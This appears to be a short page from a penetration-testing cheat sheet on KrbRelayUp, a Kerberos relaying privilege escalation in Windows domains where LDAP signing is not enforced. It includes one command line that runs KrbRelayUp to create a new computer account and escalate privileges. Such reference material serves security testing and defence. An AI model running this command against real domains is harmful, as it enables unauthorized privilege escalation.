Personal BlogTwitterGitHubContact

Kerberos Relaying

KrbRelayUp

A universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

One of the requirements for this attack to work is for LDAP Signing to be disabled within the Active Directory environment.

# Escalate privileges using KrbRelayUp
.\KrbRelayUp.exe relay -Domain $domain -CreateNewComputerAccount -ComputerName $evilname -ComputerPassword $password
PreviousKerberoastingNextLateral Movement

Last updated